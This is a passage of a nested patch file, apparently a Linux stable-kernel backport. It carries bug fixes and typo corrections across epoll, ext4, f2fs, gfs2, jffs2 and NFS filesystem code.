++ * Normally, even with the atomic_long_inc_not_zero, the file may have
++ * been free'd and then gotten re-allocated to something else (since
++ * files are not RCU-delayed, they are SLAB_TYPESAFE_BY_RCU).
++ *
++ * But for epoll, users hold the ep->mtx mutex, and as such any file in
++ * the process of being free'd will block in eventpoll_release_file()
++ * and thus the underlying file allocation will not be free'd, and the
++ * file re-use cannot happen.
++ *
++ * For the same reason we can avoid a rcu_read_lock() around the
++ * operation - 'ffd.file' cannot go away even if the refcount has
++ * reached zero (but we must still not call out to ->poll() functions
++ * etc).
++ */
++static struct file *epi_fget(const struct epitem *epi)
++{
++	struct file *file;
++
++	file = epi->ffd.file;
++	if (!atomic_long_inc_not_zero(&file->f_count))
++		file = NULL;
++	return file;
++}
++
+ /*
+  * Differs from ep_eventpoll_poll() in that internal callers already have
+  * the ep->mtx so we need to start from depth=1, such that mutex_lock_nested()
+@@ -847,14 +875,22 @@ static __poll_t __ep_eventpoll_poll(struct file *file, poll_table *wait, int dep
+ static __poll_t ep_item_poll(const struct epitem *epi, poll_table *pt,
+ 				 int depth)
+ {
+-	struct file *file = epi->ffd.file;
++	struct file *file = epi_fget(epi);
+ 	__poll_t res;
+ 
++	/*
++	 * We could return EPOLLERR | EPOLLHUP or something, but let's
++	 * treat this more as "file doesn't exist, poll didn't happen".
++	 */
++	if (!file)
++		return 0;
++
+ 	pt->_key = epi->event.events;
+ 	if (!is_file_epoll(file))
+ 		res = vfs_poll(file, pt);
+ 	else
+ 		res = __ep_eventpoll_poll(file, pt, depth);
++	fput(file);
+ 	return res & epi->event.events;
+ }
+ 
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index a843f964332c2..71ce3ed5ab6ba 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -5608,8 +5608,73 @@ static bool ext4_mb_discard_preallocations_should_retry(struct super_block *sb,
+ 	return ret;
+ }
+ 
+-static ext4_fsblk_t ext4_mb_new_blocks_simple(handle_t *handle,
+-				struct ext4_allocation_request *ar, int *errp);
++/*
++ * Simple allocator for Ext4 fast commit replay path. It searches for blocks
++ * linearly starting at the goal block and also excludes the blocks which
++ * are going to be in use after fast commit replay.
++ */
++static ext4_fsblk_t
++ext4_mb_new_blocks_simple(struct ext4_allocation_request *ar, int *errp)
++{
++	struct buffer_head *bitmap_bh;
++	struct super_block *sb = ar->inode->i_sb;
++	struct ext4_sb_info *sbi = EXT4_SB(sb);
++	ext4_group_t group, nr;
++	ext4_grpblk_t blkoff;
++	ext4_grpblk_t max = EXT4_CLUSTERS_PER_GROUP(sb);
++	ext4_grpblk_t i = 0;
++	ext4_fsblk_t goal, block;
++	struct ext4_super_block *es = EXT4_SB(sb)->s_es;
++
++	goal = ar->goal;
++	if (goal < le32_to_cpu(es->s_first_data_block) ||
++			goal >= ext4_blocks_count(es))
++		goal = le32_to_cpu(es->s_first_data_block);
++
++	ar->len = 0;
++	ext4_get_group_no_and_offset(sb, goal, &group, &blkoff);
++	for (nr = ext4_get_groups_count(sb); nr > 0; nr--) {
++		bitmap_bh = ext4_read_block_bitmap(sb, group);
++		if (IS_ERR(bitmap_bh)) {
++			*errp = PTR_ERR(bitmap_bh);
++			pr_warn("Failed to read block bitmap\n");
++			return 0;
++		}
++
++		while (1) {
++			i = mb_find_next_zero_bit(bitmap_bh->b_data, max,
++						blkoff);
++			if (i >= max)
++				break;
++			if (ext4_fc_replay_check_excluded(sb,
++				ext4_group_first_block_no(sb, group) +
++				EXT4_C2B(sbi, i))) {
++				blkoff = i + 1;
++			} else
++				break;
++		}
++		brelse(bitmap_bh);
++		if (i < max)
++			break;
++
++		if (++group >= ext4_get_groups_count(sb))
++			group = 0;
++
++		blkoff = 0;
++	}
++
++	if (i >= max) {
++		*errp = -ENOSPC;
++		return 0;
++	}
++
++	block = ext4_group_first_block_no(sb, group) + EXT4_C2B(sbi, i);
++	ext4_mb_mark_bb(sb, block, 1, 1);
++	ar->len = 1;
++
++	*errp = 0;
++	return block;
++}
+ 
+ /*
+  * Main entry point into mballoc to allocate blocks
+@@ -5634,7 +5699,7 @@ ext4_fsblk_t ext4_mb_new_blocks(handle_t *handle,
+ 
+ 	trace_ext4_request_blocks(ar);
+ 	if (sbi->s_mount_state & EXT4_FC_REPLAY)
+-		return ext4_mb_new_blocks_simple(handle, ar, errp);
++		return ext4_mb_new_blocks_simple(ar, errp);
+ 
+ 	/* Allow to use superuser reservation for quota file */
+ 	if (ext4_is_quota_file(ar->inode))
+@@ -5864,69 +5929,6 @@ ext4_mb_free_metadata(handle_t *handle, struct ext4_buddy *e4b,
+ 	return 0;
+ }
+ 
+-/*
+- * Simple allocator for Ext4 fast commit replay path. It searches for blocks
+- * linearly starting at the goal block and also excludes the blocks which
+- * are going to be in use after fast commit replay.
+- */
+-static ext4_fsblk_t ext4_mb_new_blocks_simple(handle_t *handle,
+-				struct ext4_allocation_request *ar, int *errp)
+-{
+-	struct buffer_head *bitmap_bh;
+-	struct super_block *sb = ar->inode->i_sb;
+-	ext4_group_t group;
+-	ext4_grpblk_t blkoff;
+-	ext4_grpblk_t max = EXT4_CLUSTERS_PER_GROUP(sb);
+-	ext4_grpblk_t i = 0;
+-	ext4_fsblk_t goal, block;
+-	struct ext4_super_block *es = EXT4_SB(sb)->s_es;
+-
+-	goal = ar->goal;
+-	if (goal < le32_to_cpu(es->s_first_data_block) ||
+-			goal >= ext4_blocks_count(es))
+-		goal = le32_to_cpu(es->s_first_data_block);
+-
+-	ar->len = 0;
+-	ext4_get_group_no_and_offset(sb, goal, &group, &blkoff);
+-	for (; group < ext4_get_groups_count(sb); group++) {
+-		bitmap_bh = ext4_read_block_bitmap(sb, group);
+-		if (IS_ERR(bitmap_bh)) {
+-			*errp = PTR_ERR(bitmap_bh);
+-			pr_warn("Failed to read block bitmap\n");
+-			return 0;
+-		}
+-
+-		ext4_get_group_no_and_offset(sb,
+-			max(ext4_group_first_block_no(sb, group), goal),
+-			NULL, &blkoff);
+-		while (1) {
+-			i = mb_find_next_zero_bit(bitmap_bh->b_data, max,
+-						blkoff);
+-			if (i >= max)
+-				break;
+-			if (ext4_fc_replay_check_excluded(sb,
+-				ext4_group_first_block_no(sb, group) + i)) {
+-				blkoff = i + 1;
+-			} else
+-				break;
+-		}
+-		brelse(bitmap_bh);
+-		if (i < max)
+-			break;
+-	}
+-
+-	if (group >= ext4_get_groups_count(sb) || i >= max) {
+-		*errp = -ENOSPC;
+-		return 0;
+-	}
+-
+-	block = ext4_group_first_block_no(sb, group) + i;
+-	ext4_mb_mark_bb(sb, block, 1, 1);
+-	ar->len = 1;
+-
+-	return block;
+-}
+-
+ static void ext4_free_blocks_simple(struct inode *inode, ext4_fsblk_t block,
+ 					unsigned long count)
+ {
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index bbfb37390723c..8b13832238484 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -2901,7 +2901,7 @@ static int ext4_tmpfile(struct user_namespace *mnt_userns, struct inode *dir,
+ 	inode = ext4_new_inode_start_handle(mnt_userns, dir, mode,
+ 					    NULL, 0, NULL,
+ 					    EXT4_HT_DIR,
+-			EXT4_MAXQUOTAS_INIT_BLOCKS(dir->i_sb) +
++			EXT4_MAXQUOTAS_TRANS_BLOCKS(dir->i_sb) +
+ 			  4 + EXT4_XATTR_TRANS_BLOCKS);
+ 	handle = ext4_journal_current_handle();
+ 	err = PTR_ERR(inode);
+diff --git a/fs/f2fs/checkpoint.c b/fs/f2fs/checkpoint.c
+index 3ec203bbd5593..13d8774706758 100644
+--- a/fs/f2fs/checkpoint.c
++++ b/fs/f2fs/checkpoint.c
+@@ -797,7 +797,7 @@ static void write_orphan_inodes(struct f2fs_sb_info *sbi, block_t start_blk)
+ 	 */
+ 	head = &im->ino_list;
+ 
+-	/* loop for each orphan inode entry and write them in Jornal block */
++	/* loop for each orphan inode entry and write them in journal block */
+ 	list_for_each_entry(orphan, head, list) {
+ 		if (!page) {
+ 			page = f2fs_grab_meta_page(sbi, start_blk++);
+@@ -1127,7 +1127,7 @@ int f2fs_sync_dirty_inodes(struct f2fs_sb_info *sbi, enum inode_type type,
+ 	} else {
+ 		/*
+ 		 * We should submit bio, since it exists several
+-		 * wribacking dentry pages in the freeing inode.
++		 * writebacking dentry pages in the freeing inode.
+ 		 */
+ 		f2fs_submit_merged_write(sbi, DATA);
+ 		cond_resched();
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index df6dfd7de6d0d..84585dba86a57 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -1264,7 +1264,7 @@ static int f2fs_write_compressed_pages(struct compress_ctx *cc,
+ 	int i, err;
+ 	bool quota_inode = IS_NOQUOTA(inode);
+ 
+-	/* we should bypass data pages to proceed the kworkder jobs */
++	/* we should bypass data pages to proceed the kworker jobs */
+ 	if (unlikely(f2fs_cp_error(sbi))) {
+ 		mapping_set_error(cc->rpages[0]->mapping, -EIO);
+ 		goto out_free;
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index b83b8ac29f430..0b0e3d44e158e 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -2363,7 +2363,7 @@ static int f2fs_mpage_readpages(struct inode *inode,
+ 
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+ 		if (f2fs_compressed_file(inode)) {
+-			/* there are remained comressed pages, submit them */
++			/* there are remained compressed pages, submit them */
+ 			if (!f2fs_cluster_can_merge_page(&cc, page->index)) {
+ 				ret = f2fs_read_multi_pages(&cc, &bio,
+ 							max_nr_pages,
+@@ -2779,7 +2779,7 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 
+ 	trace_f2fs_writepage(page, DATA);
+ 
+-	/* we should bypass data pages to proceed the kworkder jobs */
++	/* we should bypass data pages to proceed the kworker jobs */
+ 	if (unlikely(f2fs_cp_error(sbi))) {
+ 		mapping_set_error(page->mapping, -EIO);
+ 		/*
+@@ -2898,7 +2898,7 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ redirty_out:
+ 	redirty_page_for_writepage(wbc, page);
+ 	/*
+-	 * pageout() in MM traslates EAGAIN, so calls handle_write_error()
++	 * pageout() in MM translates EAGAIN, so calls handle_write_error()
+ 	 * -> mapping_set_error() -> set_bit(AS_EIO, ...).
+ 	 * file_write_and_wait_range() will see EIO error, which is critical
+ 	 * to return value of fsync() followed by atomic_write failure to user.
+@@ -2932,7 +2932,7 @@ static int f2fs_write_data_page(struct page *page,
+ }
+ 
+ /*
+- * This function was copied from write_cche_pages from mm/page-writeback.c.
++ * This function was copied from write_cache_pages from mm/page-writeback.c.
+  * The major change is making write step of cold data page separately from
+  * warm/hot data page.
+  */
+@@ -4195,7 +4195,7 @@ static int f2fs_iomap_begin(struct inode *inode, loff_t offset, loff_t length,
+ 	if (WARN_ON_ONCE(map.m_pblk == COMPRESS_ADDR))
+ 		return -EINVAL;
+ 
+-	if (map.m_pblk != NULL_ADDR) {
++	if (map.m_flags & F2FS_MAP_MAPPED) {
+ 		iomap->length = blks_to_bytes(inode, map.m_len);
+ 		iomap->type = IOMAP_MAPPED;
+ 		iomap->flags |= IOMAP_F_MERGED;
+diff --git a/fs/f2fs/extent_cache.c b/fs/f2fs/extent_cache.c
+index 16692c96e7650..c55359267d438 100644
+--- a/fs/f2fs/extent_cache.c
++++ b/fs/f2fs/extent_cache.c
+@@ -205,7 +205,7 @@ struct rb_node **f2fs_lookup_rb_tree_for_insert(struct f2fs_sb_info *sbi,
+  * @prev_ex: extent before ofs
+  * @next_ex: extent after ofs
+  * @insert_p: insert point for new extent at ofs
+- * in order to simpfy the insertion after.
++ * in order to simplify the insertion after.
+  * tree must stay unchanged between lookup and insertion.
+  */
+ struct rb_entry *f2fs_lookup_rb_tree_ret(struct rb_root_cached *root,
+@@ -662,7 +662,7 @@ static void __update_extent_tree_range(struct inode *inode,
+ 	if (!en)
+ 		en = next_en;
+ 
+-	/* 2. invlidate all extent nodes in range [fofs, fofs + len - 1] */
++	/* 2. invalidate all extent nodes in range [fofs, fofs + len - 1] */
+ 	while (en && en->ei.fofs < end) {
+ 		unsigned int org_end;
+ 		int parts = 0;	/* # of parts current extent split into */
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 2fbc8d89c600b..1d73582d1f63d 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -305,7 +305,7 @@ static int f2fs_do_sync_file(struct file *file, loff_t start, loff_t end,
+ 		 * for OPU case, during fsync(), node can be persisted before
+ 		 * data when lower device doesn't support write barrier, result
+ 		 * in data corruption after SPO.
+-		 * So for strict fsync mode, force to use atomic write sematics
++		 * So for strict fsync mode, force to use atomic write semantics
+ 		 * to keep write order in between data/node and last node to
+ 		 * avoid potential data corruption.
+ 		 */
+@@ -940,9 +940,14 @@ int f2fs_setattr(struct user_namespace *mnt_userns, struct dentry *dentry,
+ 				  ATTR_GID | ATTR_TIMES_SET))))
+ 		return -EPERM;
+ 
+-	if ((attr->ia_valid & ATTR_SIZE) &&
+-		!f2fs_is_compress_backend_ready(inode))
+-		return -EOPNOTSUPP;
++	if ((attr->ia_valid & ATTR_SIZE)) {
++		if (!f2fs_is_compress_backend_ready(inode))
++			return -EOPNOTSUPP;
++		if (is_inode_flag_set(inode, FI_COMPRESS_RELEASED) &&
++			!IS_ALIGNED(attr->ia_size,
++			F2FS_BLK_TO_BYTES(F2FS_I(inode)->i_cluster_size)))
++			return -EINVAL;
++	}
+ 
+ 	err = setattr_prepare(mnt_userns, dentry, attr);
+ 	if (err)
+@@ -1314,6 +1319,9 @@ static int __clone_blkaddrs(struct inode *src_inode, struct inode *dst_inode,
+ 				f2fs_put_page(psrc, 1);
+ 				return PTR_ERR(pdst);
+ 			}
++
++			f2fs_wait_on_page_writeback(pdst, DATA, true, true);
++
+ 			memcpy_page(pdst, 0, psrc, 0, PAGE_SIZE);
+ 			set_page_dirty(pdst);
+ 			set_page_private_gcing(pdst);
+@@ -1801,15 +1809,6 @@ static long f2fs_fallocate(struct file *file, int mode,
+ 		(mode & (FALLOC_FL_COLLAPSE_RANGE | FALLOC_FL_INSERT_RANGE)))
+ 		return -EOPNOTSUPP;
+ 
+-	/*
+-	 * Pinned file should not support partial trucation since the block
+-	 * can be used by applications.
+-	 */
+-	if ((f2fs_compressed_file(inode) || f2fs_is_pinned_file(inode)) &&
+-		(mode & (FALLOC_FL_PUNCH_HOLE | FALLOC_FL_COLLAPSE_RANGE |
+-			FALLOC_FL_ZERO_RANGE | FALLOC_FL_INSERT_RANGE)))
+-		return -EOPNOTSUPP;
+-
+ 	if (mode & ~(FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE |
+ 			FALLOC_FL_COLLAPSE_RANGE | FALLOC_FL_ZERO_RANGE |
+ 			FALLOC_FL_INSERT_RANGE))
+@@ -1817,6 +1816,17 @@ static long f2fs_fallocate(struct file *file, int mode,
+ 
+ 	inode_lock(inode);
+ 
++	/*
++	 * Pinned file should not support partial truncation since the block
++	 * can be used by applications.
++	 */
++	if ((f2fs_compressed_file(inode) || f2fs_is_pinned_file(inode)) &&
++		(mode & (FALLOC_FL_PUNCH_HOLE | FALLOC_FL_COLLAPSE_RANGE |
++			FALLOC_FL_ZERO_RANGE | FALLOC_FL_INSERT_RANGE))) {
++		ret = -EOPNOTSUPP;
++		goto out;
++	}
++
+ 	ret = file_modified(file);
+ 	if (ret)
+ 		goto out;
+@@ -1852,7 +1862,7 @@ static long f2fs_fallocate(struct file *file, int mode,
+ static int f2fs_release_file(struct inode *inode, struct file *filp)
+ {
+ 	/*
+-	 * f2fs_relase_file is called at every close calls. So we should
++	 * f2fs_release_file is called at every close calls. So we should
+ 	 * not drop any inmemory pages by close called by other process.
+ 	 */
+ 	if (!(filp->f_mode & FMODE_WRITE) ||
+@@ -2811,7 +2821,8 @@ static int f2fs_move_file_range(struct file *file_in, loff_t pos_in,
+ 			goto out;
+ 	}
+ 
+-	if (f2fs_compressed_file(src) || f2fs_compressed_file(dst)) {
++	if (f2fs_compressed_file(src) || f2fs_compressed_file(dst) ||
++		f2fs_is_pinned_file(src) || f2fs_is_pinned_file(dst)) {
+ 		ret = -EOPNOTSUPP;
+ 		goto out_unlock;
+ 	}
+@@ -3465,9 +3476,6 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 	if (!f2fs_sb_has_compression(sbi))
+ 		return -EOPNOTSUPP;
+ 
+-	if (!f2fs_compressed_file(inode))
+-		return -EINVAL;
+-
+ 	if (f2fs_readonly(sbi->sb))
+ 		return -EROFS;
+ 
+@@ -3486,7 +3494,8 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 		goto out;
+ 	}
+ 
+-	if (is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
++	if (!f2fs_compressed_file(inode) ||
++		is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+@@ -3511,9 +3520,12 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 		struct dnode_of_data dn;
+ 		pgoff_t end_offset, count;
+ 
++		f2fs_lock_op(sbi);
++
+ 		set_new_dnode(&dn, inode, NULL, NULL, 0);
+ 		ret = f2fs_get_dnode_of_data(&dn, page_idx, LOOKUP_NODE);
+ 		if (ret) {
++			f2fs_unlock_op(sbi);
+ 			if (ret == -ENOENT) {
+ 				page_idx = f2fs_get_next_page_offset(&dn,
+ 								page_idx);
+@@ -3531,6 +3543,8 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 
+ 		f2fs_put_dnode(&dn);
+ 
++		f2fs_unlock_op(sbi);
++
+ 		if (ret < 0)
+ 			break;
+ 
+@@ -3584,7 +3598,8 @@ static int reserve_compress_blocks(struct dnode_of_data *dn, pgoff_t count,
+ 
+ 	while (count) {
+ 		int compr_blocks = 0;
+-		blkcnt_t reserved;
++		blkcnt_t reserved = 0;
++		blkcnt_t to_reserved;
+ 		int ret;
+ 
+ 		for (i = 0; i < cluster_size; i++) {
+@@ -3604,20 +3619,26 @@ static int reserve_compress_blocks(struct dnode_of_data *dn, pgoff_t count,
+ 			 * fails in release_compress_blocks(), so NEW_ADDR
+ 			 * is a possible case.
+ 			 */
+-			if (blkaddr == NEW_ADDR ||
+-				__is_valid_data_blkaddr(blkaddr)) {
++			if (blkaddr == NEW_ADDR) {
++				reserved++;
++				continue;
++			}
++			if (__is_valid_data_blkaddr(blkaddr)) {
+ 				compr_blocks++;
+ 				continue;
+ 			}
+ 		}
+ 
+-		reserved = cluster_size - compr_blocks;
++		to_reserved = cluster_size - compr_blocks - reserved;
+ 
+ 		/* for the case all blocks in cluster were reserved */
+-		if (reserved == 1)
++		if (to_reserved == 1) {
++			dn->ofs_in_node += cluster_size;
+ 			goto next;
++		}
+ 
+-		ret = inc_valid_block_count(sbi, dn->inode, &reserved, false);
++		ret = inc_valid_block_count(sbi, dn->inode,
++						&to_reserved, false);
+ 		if (unlikely(ret))
+ 			return ret;
+ 
+@@ -3628,7 +3649,7 @@ static int reserve_compress_blocks(struct dnode_of_data *dn, pgoff_t count,
+ 
+ 		f2fs_i_compr_blocks_update(dn->inode, compr_blocks, true);
+ 
+-		*reserved_blocks += reserved;
++		*reserved_blocks += to_reserved;
+ next:
+ 		count -= cluster_size;
+ 	}
+@@ -3647,9 +3668,6 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 	if (!f2fs_sb_has_compression(sbi))
+ 		return -EOPNOTSUPP;
+ 
+-	if (!f2fs_compressed_file(inode))
+-		return -EINVAL;
+-
+ 	if (f2fs_readonly(sbi->sb))
+ 		return -EROFS;
+ 
+@@ -3661,7 +3679,8 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 
+ 	inode_lock(inode);
+ 
+-	if (!is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
++	if (!f2fs_compressed_file(inode) ||
++		!is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
+ 		ret = -EINVAL;
+ 		goto unlock_inode;
+ 	}
+@@ -3678,9 +3697,12 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 		struct dnode_of_data dn;
+ 		pgoff_t end_offset, count;
+ 
++		f2fs_lock_op(sbi);
++
+ 		set_new_dnode(&dn, inode, NULL, NULL, 0);
+ 		ret = f2fs_get_dnode_of_data(&dn, page_idx, LOOKUP_NODE);
+ 		if (ret) {
++			f2fs_unlock_op(sbi);
+ 			if (ret == -ENOENT) {
+ 				page_idx = f2fs_get_next_page_offset(&dn,
+ 								page_idx);
+@@ -3698,6 +3720,8 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 
+ 		f2fs_put_dnode(&dn);
+ 
++		f2fs_unlock_op(sbi);
++
+ 		if (ret < 0)
+ 			break;
+ 
+@@ -4065,9 +4089,6 @@ static int f2fs_ioc_decompress_file(struct file *filp, unsigned long arg)
+ 	if (!(filp->f_mode & FMODE_WRITE))
+ 		return -EBADF;
+ 
+-	if (!f2fs_compressed_file(inode))
+-		return -EINVAL;
+-
+ 	f2fs_balance_fs(sbi, true);
+ 
+ 	file_start_write(filp);
+@@ -4078,7 +4099,8 @@ static int f2fs_ioc_decompress_file(struct file *filp, unsigned long arg)
+ 		goto out;
+ 	}
+ 
+-	if (is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
++	if (!f2fs_compressed_file(inode) ||
++		is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+@@ -4137,9 +4159,6 @@ static int f2fs_ioc_compress_file(struct file *filp, unsigned long arg)
+ 	if (!(filp->f_mode & FMODE_WRITE))
+ 		return -EBADF;
+ 
+-	if (!f2fs_compressed_file(inode))
+-		return -EINVAL;
+-
+ 	f2fs_balance_fs(sbi, true);
+ 
+ 	file_start_write(filp);
+@@ -4150,7 +4169,8 @@ static int f2fs_ioc_compress_file(struct file *filp, unsigned long arg)
+ 		goto out;
+ 	}
+ 
+-	if (is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
++	if (!f2fs_compressed_file(inode) ||
++		is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index d4662ccb94c8f..5a661a0e76632 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1566,10 +1566,15 @@ static int gc_data_segment(struct f2fs_sb_info *sbi, struct f2fs_summary *sum,
+ 			int err;
+ 
+ 			inode = f2fs_iget(sb, dni.ino);
+-			if (IS_ERR(inode) || is_bad_inode(inode) ||
+-					special_file(inode->i_mode))
++			if (IS_ERR(inode))
+ 				continue;
+ 
++			if (is_bad_inode(inode) ||
++					special_file(inode->i_mode)) {
++				iput(inode);
++				continue;
++			}
++
+ 			err = f2fs_gc_pinned_control(inode, gc_type, segno);
+ 			if (err == -EAGAIN) {
+ 				iput(inode);
+diff --git a/fs/f2fs/namei.c b/fs/f2fs/namei.c
+index 328cd20b16a54..6dcc73ca32172 100644
+--- a/fs/f2fs/namei.c
++++ b/fs/f2fs/namei.c
+@@ -970,7 +970,7 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 
+ 	/*
+ 	 * If new_inode is null, the below renaming flow will
+-	 * add a link in old_dir which can conver inline_dir.
++	 * add a link in old_dir which can convert inline_dir.
+ 	 * After then, if we failed to get the entry due to other
+ 	 * reasons like ENOMEM, we had to remove the new entry.
+ 	 * Instead of adding such the error handling routine, let's
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index fcf22a50ff5db..745ecf5523c9b 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -1307,6 +1307,7 @@ struct page *f2fs_new_node_page(struct dnode_of_data *dn, unsigned int ofs)
+ 	}
+ 	if (unlikely(new_ni.blk_addr != NULL_ADDR)) {
+ 		err = -EFSCORRUPTED;
++		dec_valid_node_count(sbi, dn->inode, !ofs);
+ 		set_sbi_flag(sbi, SBI_NEED_FSCK);
+ 		f2fs_handle_error(sbi, ERROR_INVALID_BLKADDR);
+ 		goto fail;
+@@ -1333,7 +1334,6 @@ struct page *f2fs_new_node_page(struct dnode_of_data *dn, unsigned int ofs)
+ 	if (ofs == 0)
+ 		inc_valid_inode_count(sbi);
+ 	return page;
+-
+ fail:
+ 	clear_node_page_dirty(page);
+ 	f2fs_put_page(page, 1);
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index 205216c1db91f..e19b569d938d8 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -3615,7 +3615,7 @@ void f2fs_wait_on_page_writeback(struct page *page,
+ 
+ 		/* submit cached LFS IO */
+ 		f2fs_submit_merged_write_cond(sbi, NULL, page, 0, type);
+-		/* sbumit cached IPU IO */
++		/* submit cached IPU IO */
+ 		f2fs_submit_merged_ipu_write(sbi, NULL, page);
+ 		if (ordered) {
+ 			wait_on_page_writeback(page);
+diff --git a/fs/gfs2/glock.c b/fs/gfs2/glock.c
+index 235a0948f6cc6..95353982e643a 100644
+--- a/fs/gfs2/glock.c
++++ b/fs/gfs2/glock.c
+@@ -855,11 +855,13 @@ __acquires(&gl->gl_lockref.lock)
+ 	}
+ 
+ 	if (sdp->sd_lockstruct.ls_ops->lm_lock)	{
++		struct lm_lockstruct *ls = &sdp->sd_lockstruct;
++
+ 		/* lock_dlm */
+ 		ret = sdp->sd_lockstruct.ls_ops->lm_lock(gl, target, lck_flags);
+ 		if (ret == -EINVAL && gl->gl_target == LM_ST_UNLOCKED &&
+ 		    target == LM_ST_UNLOCKED &&
+-		    test_bit(SDF_SKIP_DLM_UNLOCK, &sdp->sd_flags)) {
++		    test_bit(DFL_UNMOUNT, &ls->ls_recover_flags)) {
+ 			finish_xmote(gl, target);
+ 			gfs2_glock_queue_work(gl, 0);
+ 		} else if (ret) {
+diff --git a/fs/gfs2/glops.c b/fs/gfs2/glops.c
+index 7762483f5f20f..91a542b9d81e8 100644
+--- a/fs/gfs2/glops.c
++++ b/fs/gfs2/glops.c
+@@ -82,6 +82,9 @@ static void __gfs2_ail_flush(struct gfs2_glock *gl, bool fsync,
+ 	GLOCK_BUG_ON(gl, !fsync && atomic_read(&gl->gl_ail_count));
+ 	spin_unlock(&sdp->sd_ail_lock);
+ 	gfs2_log_unlock(sdp);
++
++	if (gfs2_withdrawing(sdp))
++		gfs2_withdraw(sdp);
+ }
+ 
+ 
+diff --git a/fs/gfs2/util.c b/fs/gfs2/util.c
+index 7a6aeffcdf5ca..48c69aa60cd17 100644
+--- a/fs/gfs2/util.c
++++ b/fs/gfs2/util.c
+@@ -359,7 +359,6 @@ int gfs2_withdraw(struct gfs2_sbd *sdp)
+ 			fs_err(sdp, "telling LM to unmount\n");
+ 			lm->lm_unmount(sdp);
+ 		}
+-		set_bit(SDF_SKIP_DLM_UNLOCK, &sdp->sd_flags);
+ 		fs_err(sdp, "File system withdrawn\n");
+ 		dump_stack();
+ 		clear_bit(SDF_WITHDRAW_IN_PROG, &sdp->sd_flags);
+diff --git a/fs/jffs2/xattr.c b/fs/jffs2/xattr.c
+index acb4492f5970c..5a31220f96f5f 100644
+--- a/fs/jffs2/xattr.c
++++ b/fs/jffs2/xattr.c
+@@ -1111,6 +1111,9 @@ int do_jffs2_setxattr(struct inode *inode, int xprefix, const char *xname,
+ 		return rc;
+ 
+ 	request = PAD(sizeof(struct jffs2_raw_xattr) + strlen(xname) + 1 + size);
++	if (request > c->sector_size - c->cleanmarker_size)
++		return -ERANGE;
++
+ 	rc = jffs2_reserve_space(c, request, &length,
+ 				 ALLOC_NORMAL, JFFS2_SUMMARY_XATTR_SIZE);
+ 	if (rc) {
+diff --git a/fs/nfs/filelayout/filelayout.c b/fs/nfs/filelayout/filelayout.c
+index 4974cd18ca468..b363e1bdacdac 100644
+--- a/fs/nfs/filelayout/filelayout.c
++++ b/fs/nfs/filelayout/filelayout.c
+@@ -881,7 +881,7 @@ filelayout_pg_init_read(struct nfs_pageio_descriptor *pgio,
+ 						      NFS4_MAX_UINT64,
+ 						      IOMODE_READ,
+ 						      false,
+-						      GFP_KERNEL);
++						      nfs_io_gfp_mask());
+ 		if (IS_ERR(pgio->pg_lseg)) {
+ 			pgio->pg_error = PTR_ERR(pgio->pg_lseg);
+ 			pgio->pg_lseg = NULL;
+@@ -905,7 +905,7 @@ filelayout_pg_init_write(struct nfs_pageio_descriptor *pgio,
+ 						      NFS4_MAX_UINT64,
+ 						      IOMODE_RW,
+ 						      false,
+-						      GFP_NOFS);
++						      nfs_io_gfp_mask());
+ 		if (IS_ERR(pgio->pg_lseg)) {
+ 			pgio->pg_error = PTR_ERR(pgio->pg_lseg);
+ 			pgio->pg_lseg = NULL;
+diff --git a/fs/nfs/fs_context.c b/fs/nfs/fs_context.c
+index 9bcd53d5c7d46..9a5b735e74f9e 100644
+--- a/fs/nfs/fs_context.c
++++ b/fs/nfs/fs_context.c
+@@ -1047,9 +1047,12 @@ static int nfs23_parse_monolithic(struct fs_context *fc,
+ 		ctx->acdirmax	= data->acdirmax;
+ 		ctx->need_mount	= false;
+ 
+-		memcpy(sap, &data->addr, sizeof(data->addr));
+-		ctx->nfs_server.addrlen = sizeof(data->addr);
+-		ctx->nfs_server.port = ntohs(data->addr.sin_port);
++		if (!is_remount_fc(fc)) {
++			memcpy(sap, &data->addr, sizeof(data->addr));
